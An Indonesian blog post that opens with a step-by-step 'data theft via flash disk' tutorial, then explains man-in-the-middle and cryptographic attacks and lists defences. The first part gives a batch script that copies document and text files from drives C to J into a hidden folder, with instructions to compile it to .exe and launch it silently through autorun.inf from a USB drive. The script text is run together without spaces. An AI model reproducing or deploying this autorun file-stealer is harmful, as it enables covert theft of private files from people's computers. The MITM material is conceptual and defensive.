TEKNIK PENCURIAN DATA MELALUI FLASHDISK
Ada banyak cara melakukan mencuri data, yang akan kami bahas kali ini adalah teknik pencurian data pada flashdisk. Cara yang bisa kita lakukan adalah dengan menuliskan coding dibawah ini pada notpad atau wordpad
@echooff
REMName:silentxxx
REMAuthor:Silentxxx
Setsilent=%computername%_%random%
Ifnotexist"%silent%"Md"%silent%"
For%%ain(CDEFGHIJ)doifexist%%a:\(
For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.doc')do(
attribshr"%%b"
copy"%%b""%silent%"/y)
For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.xls')do(
attribshr"%%b"
copy"%%b""%silent%"/y)
For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.txt')do(
attribshr"%%b"
copy"%%b""%silent%"/y)
For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.docx')do(
attribshr"%%b"
copy"%%b""%silent%"/y)
)
Save as Dengan Reserah.bat dan save as type all files….
Sekarang coba jalankan file*.bat tersebut maka disamping File akan terbuat sebuah folder yang berisi
Semua file yang dicopy dari Drive C hingga J…
Code diatas dapat ditambah sesuai dengan kebutuhan dan keinginan
Tambah kan ini dapat code2x diatas:
For/f"tokens=*"%%bin('dir/a/b/s%%a:\*.txt')do(
attribshr"%%b"
copy"%%b""%silent%"/y)
dan rubah*.Txt menjadi file yang lain misalkan dengan Extensi*.exe atau *.PDF.
Den selalu“)”sebagai penutup sourcecodenya.
Dan yang saya sebut dengan mudah Tadi adalah jika file*.bat dapat berjalan dengan sendiri dan
Mengcopy semua file.
OK sebelumnya lebih baik File*.bat yang telah kita buat tersebut tadi kita jadilkan File dengan
extensi*.exe. dengan mengunakan software“Bat_To_Exe_ConverterV1.5”
Kalau belum punya download di http://www.brothersoft.com/battoexeconverter50301.html
Agar file yang kita buat tadi dapat berjalan sendiri sekarang kita buat AUTORUN.INF:
Ketik kan pada kode dibawah:
[autorun]
Open=terserah.exe
Save as dengan File autorun.inf dan save as type dengan all files.
Letakan kedua file autorun.inf dan terserah.exe didalam dictory USB flashdrive.
TEKNIK HACKING DENGAN SNIFF
Man-in-the-middle (MITM) attack adalah salah satu serangan pada tahap gaining access. Dengan cara ini seseorang bisa membaca, menyisipkan, dan memalsukan data antara dua komputer yang saling terhubung di dalam switched network. Man-in-the-middle attack dapat dilakukan jika komputer attacker berada di dalam satu network dengan dua komputer yang lainnya sesuai dengan namanya, Man-in-tthe-middle, Atttacker harus menempatkan diri di tengah-tengah komunikasi antara komputer User A dan komputer User B sehingga attacker bisa meng-capture (sniff)
semua data dari komputer User A dan komputer User
Serangan Terhadap Kriptografi
Serangan terhadap kriptografi berarti usaha untuk menemukan kunci atau plaintext dari ciphertext.
Suatu serangan dapat digolongkan menjadi dua jenis serangan berdasarkan keterlibatan penyerang (kriptanalis) pada komunikasi, yakni serangan pasif dan serangan aktif.
Serangan pasif berarti seorang penyerang tidak berinteraksi dengan kelompok yang sedang berkomunikasi dan hanya memanfaatkan data yang diperoleh (seperti ciphertext). Ciri-ciri dari serangan pasif adalah penyerang tidak terlibat dalam komunikasi antara pengirim dan penerima, serta penyerang hanya melakukkan penyadapan (eavesdropping) untuk memperoleh data sebanyak-banyaknya . Penyadapan dapat berbentuk wiretapping, electromagnetic eavesdropping, dan accoustic eavesdropping.
Serangan aktif berarti penyerang tidak hanya mengiintervensi komunikasi, tetapi juga ikut mempengaruhi sistem. Penyerang dapat saja menghapus sebagian ciphertext, mengubah ciphertext, menyisipkan potongan ciphertext palsu, membalas pesan lama, atau mengubah informasi yang tersimpan. Salah satu contoh serangaan aktif adalahh man-in-the-middle attack (MITM).
MITM adalah serangan dimana penyerang mampu untuk membaca, menambah dan mengubah sesuai kehendak pesan antara dua kelompok tanpa sepengetahuan kelompok tersebut. MITM biasanya dilakukan terhadap kriptografi asimetri dan bisa juga pada protocol Diffi-Hellman.
Untuk lebih jelasnya kita misalkan Alice dan Bob sebagai dua orang yang akan berkomunikasi, dan Malice berkehendak untuk menyadaap komunikasi tersebut serta mengirimkan pesan yang salah kepada Bob.
Untuk memulai komunik asi, pertama-tama Alice meminta Bob untuk mengirimkan kunci public miliknya. Ketika Malice dapat menyadap kunci publik yang dikirim, maka MITM akan dapat segera dimulai. Malice dapat dengan mudah mengirimkan Alice kunci publik yaang cocok dengan kunci pribadi milik Alice. Alice yang mempercayai bahwa kunci yang ia terima berasal dari Bob, mulai mengenkripsi kunci yang sebenarnya dikirim oleh Malice dan kemudian mengirimkan kembali ke Bob pesan yang telah dienkripsi. Malice lalu kembali menyadap komunikasi dan mendeskripsi pesan tersebut, menyimpan salinan pesan, kemudian mengenkripsi pesan yang telah diubah menggunakan kunci publik yang dikirimkan oleh Bob dan kemudian mengirimkannya kepada Bob. Ketika Bob menerima ciphertext, maka ia akan percaya bahwa pesan tersebut
berasal dari Alice.
Pertahanan terhadap serranganUntuk menjagaa keamanan dari serangan M ITM maka dapat dinggunakan beberapa teknik otentikasi sebagai berikut :
• Menggunakan Infrastruktur public-key yang sudah dii sertifikasi
• Menggunakan otentifikasi mutual yang kuat
• Menggunakan kunci-kunci rahasia (Secret keys/high information entropy secrets)
• Menggunakan kata sandi/Passwords (low information entropy secrets)
• Menggunakan pengenal suara (voice recognition)
• Menggunakan pesan rahasia untuk sesaat
Selain itu, untuk mengatasi model serangan ‘man-in–the-middle-attack’, perlu ada sebuah metode untuk melakukan otentikasi host yang kita hub ungi. Otentikasi dapat berupa digital certifiicate yang eksklusif dimiliki oleh host tersebut.
-
0 comments:
Post a Comment